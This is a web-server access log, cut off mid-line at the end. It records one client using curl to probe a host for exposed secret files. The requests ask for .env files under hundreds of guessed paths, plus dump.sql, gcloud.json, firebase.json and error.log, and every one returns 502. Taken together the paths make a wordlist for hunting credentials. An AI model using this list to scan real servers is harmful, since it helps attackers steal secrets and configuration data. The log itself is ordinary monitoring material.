502 - GET https terminal.profibot.hu "/developer.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/developer/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/developerslv/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/development/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/devs.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/devtools" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/directories/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/dist/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/dist/js/app.[hash].js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/django-blog/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/django/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/django_project_path/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/doc/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/docker-compose.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/docker-compose/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/docker-compose/platform/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/docker-elk/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/docker-network-healthcheck/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/docker-node-mongo-redis/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/docker/compose/withMongo/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/docker/compose/withPostgres/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:19 +0000] - - 502 - GET https terminal.profibot.hu "/docker/database/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/docker/db/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/docker/dev/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/docker/examples/compose/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/docker/postgres/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/docker/webdav/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/docs/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/dodoswap-client/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/dotfiles/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/download/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/downloads/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/drupal/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/dump.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/e2e/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/en/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/engine/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/env.example" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/env.save" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/env.template" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/env/dockers/mariadb-test/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/env/dockers/php-apache/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/env/example/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/env/template/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/environments/local/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/environments/production/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/envs/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/error.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/error/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/errors/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/example/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/example02-golang-package/import-underscore/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/example27-how-to-load-env/sample01/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/example27-how-to-load-env/sample02/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:20 +0000] - - 502 - GET https terminal.profibot.hu "/examples/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/01-simple-model/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/02-complex-example/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/03-one-to-many-relationship/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/04-many-to-many-relationship/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/05-migrations/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/06-base-service/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/07-feature-flags/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/08-performance/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/09-production/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/10-subscriptions/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/11-transactions/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/drupal-separate-services/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/react-dashboard/backend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/sdl-first/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/sdl-first/prisma/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/vue-dashboard/backend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/web/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/with-cookie-auth-fauna/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/with-dotenv/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/with-firebase-authentication-serverless/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/with-react-relay-network-modern/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/with-relay-modern/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/examples/with-universal-configuration-build-time/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/exapi/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/Exercise.Frontend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/Exercise.Frontend/train/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/export/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/fastlane/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/favicons/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/favs/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/FE/huey/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/fedex/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:21 +0000] - - 502 - GET https terminal.profibot.hu "/fhir-api/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/files/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/fileserver/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/films/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/Final_Project/Airflow_Dag/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/Final_Project/kafka_twitter/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/Final_Project/StartingFile/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/finalVersion/lcomernbootcamp/projbackend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/firebase.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/first-network/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/FIRST_CONFIG/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/fisdom/fisdom/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/fixtures/blocks/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/fixtures/fiber-debugger/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/fixtures/flight/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/fixtures/kitchensink/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/flask/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/flask_test_uploads/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/fm/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/font-icons/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/fonts/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/framework/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/front-app/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/front-empathy/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/front-end/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/front/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/front/src/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/frontend/momentum-fe/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/frontend/react/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/frontend/vue/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/frontend/web/debug/default/view" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/frontendfinaltest/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/ftp/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:22 +0000] - - 502 - GET https terminal.profibot.hu "/ftpmaster/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/functions/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/gcloud.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/gcp/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/gists/cache" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/gists/laravel" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/gists/pusher" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/github-connect/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/google/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/graphiql/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/graphql/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/grems-api/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/grems-frontend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/Hash/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/hasura/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/hc/restricted" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/Helmetjs/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/hgs-static/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/higlass-website/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/home/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/horde/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/hotpot-app-frontend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/htdocs/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/html/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/http/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/httpboot/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/httpdocs/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/HUNIV_migration/.env" [Client 185.177.72.13] [Length 154] [Gzip -] 